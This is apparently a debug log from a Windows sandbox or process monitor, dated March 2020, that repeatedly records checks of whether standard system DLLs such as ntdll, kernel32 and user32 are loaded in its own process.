2020-03-24 10:16:32,828 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,828 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,828 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,828 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,828 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,858 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:32,858 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:32,858 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:32,858 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:32,875 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:16:32,875 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:16:32,875 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:16:32,875 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:16:32,875 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:32,890 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:32,890 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:16:32,890 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:16:32,890 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,905 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,905 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,905 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:32,905 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,921 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,921 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,921 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,921 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,937 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,937 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,937 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,937 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,953 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,953 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,983 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:32,983 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,999 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,999 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,999 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,999 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,999 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,015 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,015 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,015 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,030 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,030 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,030 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,046 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,046 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:16:33,046 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:16:33,046 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:33,062 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:33,062 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:33,062 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:33,076 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:33,076 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:16:33,076 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:16:33,076 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:16:33,092 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:16:33,092 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:16:33,092 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:16:33,108 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:33,108 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:33,108 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,108 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,124 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,124 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,140 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,140 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,140 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,154 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,171 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,171 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,171 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,187 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,187 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,187 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,187 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,201 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,201 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,201 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,217 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,217 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,217 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,217 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,233 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,233 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,233 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,249 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,249 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,249 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,265 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,265 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,265 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,296 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,296 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,296 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,311 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,311 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,311 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,311 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,326 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,326 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,342 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,342 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,342 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,358 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,374 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,374 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,374 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,436 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,436 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,436 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,451 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,451 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,467 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,467 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,467 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,467 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,483 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,483 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,483 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,499 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,499 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,499 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,499 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,529 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,529 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,529 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,529 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,545 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,545 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,545 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,561 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,561 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,561 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,561 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,561 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,576 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,576 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,576 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,592 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,592 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,622 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,622 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:33,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,686 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,747 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,747 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,795 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,795 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
